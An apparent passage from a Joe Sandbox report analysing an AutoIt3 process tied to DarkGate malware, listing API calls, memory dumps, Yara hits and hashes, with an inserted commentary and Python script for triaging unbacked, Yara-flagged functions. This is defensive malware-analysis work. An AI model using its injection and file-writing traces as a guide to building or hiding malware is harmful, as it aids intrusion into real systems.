                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 008875CD
                                      • GetWindowLongW.USER32(?,000000F0), ref: 008875F1
                                      • _memset.LIBCMT ref: 00887602
                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00887614
                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 0088768C
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: MessageSend$LongWindow_memset
                                      • String ID:
                                      • API String ID: 830647256-0
                                      • Opcode ID: c4b820052ef1ecbee261256ae55c5a361b1759ab4ef78bb070eb0c3303ac25e8
                                      • Instruction ID: b98894172b0c12f882cc292d27b6a822c09626c8cf99fb2897a5bbdce6bb02ca
                                      • Opcode Fuzzy Hash: c4b820052ef1ecbee261256ae55c5a361b1759ab4ef78bb070eb0c3303ac25e8
                                      • Instruction Fuzzy Hash: C1616775900208AFDB10EFA8CC85EAE77F8FB49714F2401A9FA15E72A1D770AD41DB60
                                      APIs
                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 008577DD
                                      • SafeArrayAllocData.OLEAUT32(?), ref: 00857836
                                      • VariantInit.OLEAUT32(?), ref: 00857848
                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00857868
                                      • VariantCopy.OLEAUT32(?,?), ref: 008578BB
                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 008578CF
                                      • VariantClear.OLEAUT32(?), ref: 008578E4
                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 008578F1
                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 008578FA
                                      • VariantClear.OLEAUT32(?), ref: 0085790C
                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00857917
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                      • String ID:
                                      • API String ID: 2706829360-0
                                      • Opcode ID: 6b5b07850cbf4ec3d18cb638009d6f2d61d640ad654394df835961685384fc15
                                      • Instruction ID: f7d03c0e3b18d7ef685e2a2be39679ac59d66b8aa8f694020fb772eab98aaa01
                                      • Opcode Fuzzy Hash: 6b5b07850cbf4ec3d18cb638009d6f2d61d640ad654394df835961685384fc15
                                      • Instruction Fuzzy Hash: 45417F75A002199FCB00EFA8DC489ADBBB8FF48345F04C069E955E7261C730AA49CFA5
                                      APIs
                                        • Part of subcall function 00804D37: __itow.LIBCMT ref: 00804D62
                                        • Part of subcall function 00804D37: __swprintf.LIBCMT ref: 00804DAC
                                      • CoInitialize.OLE32 ref: 00878AED
                                      • CoUninitialize.OLE32 ref: 00878AF8
                                      • CoCreateInstance.OLE32(?,00000000,00000017,00893BBC,?), ref: 00878B58
                                      • IIDFromString.OLE32(?,?), ref: 00878BCB
                                      • VariantInit.OLEAUT32(?), ref: 00878C65
                                      • VariantClear.OLEAUT32(?), ref: 00878CC6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                      • API String ID: 834269672-1287834457
                                      • Opcode ID: 257cc130fe596070b2a89aaf4e379af479b2d92ab93ca3064934710a3bf6348f
                                      • Instruction ID: fde017905bf12416850d9e782edf62a80ad515f1706609a9f777db475405edd1
                                      • Opcode Fuzzy Hash: 257cc130fe596070b2a89aaf4e379af479b2d92ab93ca3064934710a3bf6348f
                                      • Instruction Fuzzy Hash: 7A619FB0244711DFD711DF14C889A5ABBE8FF85718F048859F989DB291CB70ED48CBA2
                                      APIs
                                      • WSAStartup.WSOCK32(00000101,?), ref: 00875E7E
                                      • inet_addr.WSOCK32(?,?,?), ref: 00875EC3
                                      • gethostbyname.WSOCK32(?), ref: 00875ECF
                                      • IcmpCreateFile.IPHLPAPI ref: 00875EDD
                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00875F4D
                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00875F63
                                      • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00875FD8
                                      • WSACleanup.WSOCK32 ref: 00875FDE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                      • String ID: Ping
                                      • API String ID: 1028309954-2246546115
                                      • Opcode ID: b06fb5908d3a52d9076c11e8532667af281138918a6722c04a8032a84a6dfb51
                                      • Instruction ID: 2777a3cbca2d75d4e201e553575e7e2ed9aa50dbd9a1265b235bf03d4a4f2b09
                                      • Opcode Fuzzy Hash: b06fb5908d3a52d9076c11e8532667af281138918a6722c04a8032a84a6dfb51
                                      • Instruction Fuzzy Hash: D6518E316046019FD720EF24DC49B2AB7E4FF48724F14896AF999DB2A1DBB0E940DF42
                                      APIs
                                      • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,00000080,00000000,00000000,03CFA4C6,?,?,00000000,00000000), ref: 03CFA360
                                      • ReadFile.KERNEL32(000000FF,03CF9C52,00000000,?,00000000,00000000), ref: 03CFA3AF
                                      • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000001,00000000,00000000), ref: 03CFA3EE
                                      • SetFilePointer.KERNEL32(000000FF,?,00000000,00000000,000000FF,00000000,00000000,00000001,00000000,00000000), ref: 03CFA409
                                      • WriteFile.KERNEL32(000000FF,?,?,?,00000000,000000FF,?,00000000,00000000,000000FF,00000000,00000000,00000001,00000000,00000000), ref: 03CFA41F
                                      • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,000000FF,03CF9C52,00000000,?,00000000,00000000), ref: 03CFA441
                                      • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000,000000FF,00000000,00000000,00000002,000000FF,03CF9C52,00000000,?,00000000,00000000), ref: 03CFA45D
                                      • CloseHandle.KERNEL32(000000FF,03CFA49D,?,00000000,00000000), ref: 03CFA490
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$Pointer$Write$CloseCreateHandleRead
                                      • String ID: darkgate
                                      • API String ID: 3484830659-757439335
                                      • Opcode ID: 0a089a3bb7ab9544af7f9ece0abf900c23c4d17b7951efca27811dd22a06a69d
                                      • Instruction ID: 947599e53205d8fd2757fdf510ab9e1006175ef162e872a0b4ac66b0b52d3128
                                      • Opcode Fuzzy Hash: 0a089a3bb7ab9544af7f9ece0abf900c23c4d17b7951efca27811dd22a06a69d
                                      • Instruction Fuzzy Hash: 19516279A10308AFDB51EBA8CC55FDEBBB8EB4C700F558425F608FB280D675A9009B65
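What separates the function just listed from the surrounding entries is not its API list (the AutoIt3 interpreter opens and writes files too) but its Memory Dump Source: it was lifted from a region at 03CC1000 that is "based on PE: false", i.e. executable memory with no image backing it, and a Yara rule fired on that dump. The Python below is an added example, not Joe Sandbox code and not part of this report: it parses entries in the format shown above (the APIs / Memory Dump Source / Similarity blocks, with the "• " bullets as extracted here) and separates unbacked or Yara-flagged functions from the interpreter's own code. The sample input is constructed from two entries on this page, trimmed to two API lines each. The CreateFileW decoding assumes the report prints call arguments positionally, which is how the lines above read but is not documented on this page; 0xC0000000 is GENERIC_READ|GENERIC_WRITE and disposition 3 is OPEN_EXISTING.

```python
"""Parse Joe Sandbox function-analysis entries (APIs / Memory Dump Source / Similarity
blocks) and triage them. Added example, not Joe Sandbox code and not part of the report."""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed sample: two entries from this report, trimmed to two API lines each:
# the AutoIt3.exe Ping() helper (PE-backed) and the DarkGate file writer (unbacked, Yara hit).
SAMPLE = """\
APIs
• WSAStartup.WSOCK32(00000101,?), ref: 00875E7E
• IcmpCreateFile.IPHLPAPI ref: 00875EDD
Memory Dump Source
• Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
Similarity
• String ID: Ping
APIs
• CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,00000080,00000000,00000000,03CFA4C6,?,?,00000000,00000000), ref: 03CFA360
• WriteFile.KERNEL32(000000FF,?,?,?,00000000,000000FF,?,00000000,00000000,000000FF,00000000,00000000,00000001,00000000,00000000), ref: 03CFA41F
Memory Dump Source
• Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
Yara matches
Similarity
• String ID: darkgate
"""

SRC_RE = re.compile(r"^• Source File: (?P<file>\S+), Offset: (?P<off>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)$")

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]   # hex tokens as printed; "?" means the value was not recovered
    ref: int          # call-site address

@dataclass
class FunctionEntry:
    apis: List[ApiCall] = field(default_factory=list)
    source_file: str = ""
    offset: int = 0                    # base of the dumped region
    pe_backed: Optional[bool] = None   # "based on PE: true/false"
    yara_match: bool = False
    string_id: str = ""

def parse_api_line(line: str) -> ApiCall:
    """'• Name.MODULE(args), ref: ADDR' or '• Name.MODULE ref: ADDR'."""
    head, ref = line[2:].rsplit(" ref: ", 1)
    name_mod, _, arg_str = head.rstrip(",").partition("(")
    name, module = name_mod.rsplit(".", 1)
    args = arg_str.rstrip(")").split(",") if arg_str else []
    return ApiCall(name, module, args, int(ref, 16))

def parse_entries(text: str) -> List[FunctionEntry]:
    entries: List[FunctionEntry] = []
    cur: Optional[FunctionEntry] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":                       # every function block starts here
            entries.append(cur := FunctionEntry())
        elif cur is None or not line:
            continue
        elif line == "Yara matches":
            cur.yara_match = True
        elif " ref: " in line and "Part of subcall" not in line:
            cur.apis.append(parse_api_line(line))  # callee ("subcall") lines are skipped
        elif (m := SRC_RE.match(line)):
            cur.source_file, cur.offset = m["file"], int(m["off"], 16)
            cur.pe_backed = m["pe"] == "true"
        elif line.startswith("• String ID: "):
            cur.string_id = line[len("• String ID: "):]
    return entries

GENERIC_READ, GENERIC_WRITE = 0x80000000, 0x40000000
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}

def decode_createfile(call: ApiCall) -> Tuple[str, str]:
    """(dwDesiredAccess, dwCreationDisposition) of a CreateFileW call, assuming the
    report prints arguments positionally (access is argument 2, disposition argument 5)."""
    def hexarg(i: int) -> Optional[int]:
        return int(call.args[i], 16) if i < len(call.args) and call.args[i] != "?" else None
    access, disp = hexarg(1), hexarg(4)
    flags = [n for n, bit in (("GENERIC_READ", GENERIC_READ), ("GENERIC_WRITE", GENERIC_WRITE))
             if access is not None and access & bit]
    return "|".join(flags) or "?", DISPOSITION.get(disp, "?")

def triage(entry: FunctionEntry) -> List[str]:
    """Reasons to read this function before the interpreter's own code."""
    reasons = []
    if entry.pe_backed is False:
        reasons.append("code sits in memory not backed by a PE image (unpacked or injected)")
    if entry.yara_match:
        reasons.append("Yara rule matched on the dump")
    if {"CreateFileW", "WriteFile"} <= {c.name for c in entry.apis}:
        cf = next(c for c in entry.apis if c.name == "CreateFileW")
        access, disp = decode_createfile(cf)
        reasons.append(f"opens a file ({disp}, {access}) and writes to it")
    return reasons
```

Running `triage()` over `parse_entries(SAMPLE)` yields nothing for the Ping() helper and three findings for the 03CC1000 function. On a full report, feed it the whole function-analysis section: the PE-backed entries belong to the mapped AutoIt3.exe image and are the interpreter's runtime, so the unbacked, Yara-flagged ones are where the injected payload lives, and subtracting `offset` from a call-site `ref` gives the offset into the dumped region for follow-up in the disassembler.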
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 0086BB13
                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0086BB89
                                      • GetLastError.KERNEL32 ref: 0086BB93
                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 0086BC00
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Error$Mode$DiskFreeLastSpace
                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                      • API String ID: 4194297153-14809454
                                      • Opcode ID: fa77aefd2924c862c24db53dcf9501f181031ed8c4c17cba4f53c6d19a3eb687
                                      • Instruction ID: 13606796db9c9dcd3295cfa24f14caab7d242a74290eb7218e3fa0f22e8778a0
                                      • Opcode Fuzzy Hash: fa77aefd2924c862c24db53dcf9501f181031ed8c4c17cba4f53c6d19a3eb687
                                      • Instruction Fuzzy Hash: BE31D034A40209AFCB10EF68C845EADB7B8FF44328F15802AE905D7395DB709D81CB91
                                      APIs
                                        • Part of subcall function 00811A36: _memmove.LIBCMT ref: 00811A77
                                        • Part of subcall function 0085B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0085B7BD
                                      • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00859BCC
                                      • GetDlgCtrlID.USER32 ref: 00859BD7
                                      • GetParent.USER32 ref: 00859BF3
                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00859BF6
                                      • GetDlgCtrlID.USER32(?), ref: 00859BFF
                                      • GetParent.USER32(?), ref: 00859C1B
                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 00859C1E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 1536045017-1403004172
                                      • Opcode ID: 79c59231efc55bbf551964f5d8554dd261c0e599190997f5f076bb45034ca61b
                                      • Instruction ID: 8dcecfa802a3bdb5a097480a5df750a8ad5df097551df1bc22cc75e1f37f98ca
                                      • Opcode Fuzzy Hash: 79c59231efc55bbf551964f5d8554dd261c0e599190997f5f076bb45034ca61b
                                      • Instruction Fuzzy Hash: 0A21B271A00204AFDF05EBA4CC85EFEBBA9FFA5311F100116FDA1D3291EB7559589A21
                                      APIs
                                        • Part of subcall function 00811A36: _memmove.LIBCMT ref: 00811A77
                                        • Part of subcall function 0085B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0085B7BD
                                      • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00859CB5
                                      • GetDlgCtrlID.USER32 ref: 00859CC0
                                      • GetParent.USER32 ref: 00859CDC
                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00859CDF
                                      • GetDlgCtrlID.USER32(?), ref: 00859CE8
                                      • GetParent.USER32(?), ref: 00859D04
                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 00859D07
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 1536045017-1403004172
                                      • Opcode ID: 98bd32b9f9cd61d76a55003518c17e438131a5c78cf34583d4fe08301a2de782
                                      • Instruction ID: 05cdf239cdc154694c6b0e0ec6afe349fb47efad5de0da0fed64563ccda77001
                                      • Opcode Fuzzy Hash: 98bd32b9f9cd61d76a55003518c17e438131a5c78cf34583d4fe08301a2de782
                                      • Instruction Fuzzy Hash: D921C171A00208BFDF11ABA4CC85EFEBBB9FF94300F100016FD51D3291EB754958AA20
                                      APIs
                                      • GetParent.USER32 ref: 00859D27
                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00859D3C
                                      • _wcscmp.LIBCMT ref: 00859D4E
                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00859DC9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ClassMessageNameParentSend_wcscmp
                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                      • API String ID: 1704125052-3381328864
                                      • Opcode ID: 3c1c66526a44604626fe71c79ea374e6be438f10d8d14ad809f195cc921bcdee
                                      • Instruction ID: 3967d41dc0ee613ea3862bb6b29064a16f6c41d4261305ce4164b4e9aac3b792
                                      • Opcode Fuzzy Hash: 3c1c66526a44604626fe71c79ea374e6be438f10d8d14ad809f195cc921bcdee
                                      • Instruction Fuzzy Hash: B1115977248326FEFA142664FC17DE677ACFB00362B200013FE20E41D1FF6A6A651951
                                      APIs
                                      • VariantInit.OLEAUT32(?), ref: 00878FC1
                                      • CoInitialize.OLE32(00000000), ref: 00878FEE
                                      • CoUninitialize.OLE32 ref: 00878FF8
                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 008790F8
                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 00879225
                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00893BDC), ref: 00879259
                                      • CoGetObject.OLE32(?,00000000,00893BDC,?), ref: 0087927C
                                      • SetErrorMode.KERNEL32(00000000), ref: 0087928F
                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0087930F
                                      • VariantClear.OLEAUT32(?), ref: 0087931F
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                      • String ID:
                                      • API String ID: 2395222682-0
                                      • Opcode ID: 36469a420a7f9583b5983047d871070ea6d147ed74faea251db74353261b7c6b
                                      • Instruction ID: 28b43bc51a027ed1062c8cff5bc729ccedcaa59fb2d6c415bcaba21c9f7c8c62
                                      • Opcode Fuzzy Hash: 36469a420a7f9583b5983047d871070ea6d147ed74faea251db74353261b7c6b
                                      • Instruction Fuzzy Hash: A5C113B1608305AFD700EF68C88492AB7E9FF89348F04895DF99ADB251DB71ED05CB52
                                      APIs
                                      • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00868027
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ArraySafeVartype
                                      • String ID:
                                      • API String ID: 1725837607-0
                                      • Opcode ID: 692768d4bafdb6707c68b3529a23d6f3e76ce96ac2d04a78d65c9edfb31df825
                                      • Instruction ID: 692d761d86bec148545f0f3784c454961755c99bc6a5aca1d494ad4bd4278afc
                                      • Opcode Fuzzy Hash: 692768d4bafdb6707c68b3529a23d6f3e76ce96ac2d04a78d65c9edfb31df825
                                      • Instruction Fuzzy Hash: 22B1C071A0061ADFDB00DF98D895BBEB7B4FF09325F264529E604E7281DB34A941CB91
                                      APIs
                                      • GetCurrentThreadId.KERNEL32 ref: 008619EF
                                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00860A67,?,00000001), ref: 00861A03
                                      • GetWindowThreadProcessId.USER32(00000000), ref: 00861A0A
                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00860A67,?,00000001), ref: 00861A19
                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00861A2B
                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00860A67,?,00000001), ref: 00861A44
                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00860A67,?,00000001), ref: 00861A56
                                      • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00860A67,?,00000001), ref: 00861A9B
                                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00860A67,?,00000001), ref: 00861AB0
                                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00860A67,?,00000001), ref: 00861ABB
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                      • String ID:
                                      • API String ID: 2156557900-0
                                      • Opcode ID: 8d9ebf6d356b725d5f0789aa43858e5cda52a0f89901353ae54138e7978fa6a6
                                      • Instruction ID: cbc365c95df76e6d7a819f3696370c5d019bf676ac8960fbe40f56a8e7322a23
                                      • Opcode Fuzzy Hash: 8d9ebf6d356b725d5f0789aa43858e5cda52a0f89901353ae54138e7978fa6a6
                                      • Instruction Fuzzy Hash: C731BA71651218AFEF11AF90EC48FAA37BAFB6431AF1A411AF801C6191CFB49D40CF60
                                      APIs
                                      • GetSysColor.USER32(00000008), ref: 0080260D
                                      • SetTextColor.GDI32(?,000000FF), ref: 00802617
                                      • SetBkMode.GDI32(?,00000001), ref: 0080262C
                                      • GetStockObject.GDI32(00000005), ref: 00802634
                                      • GetClientRect.USER32(?), ref: 0083C0FC
                                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 0083C113
                                      • GetWindowDC.USER32(?), ref: 0083C11F
                                      • GetPixel.GDI32(00000000,?,?), ref: 0083C12E
                                      • ReleaseDC.USER32(?,00000000), ref: 0083C140
                                      • GetSysColor.USER32(00000005), ref: 0083C15E
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
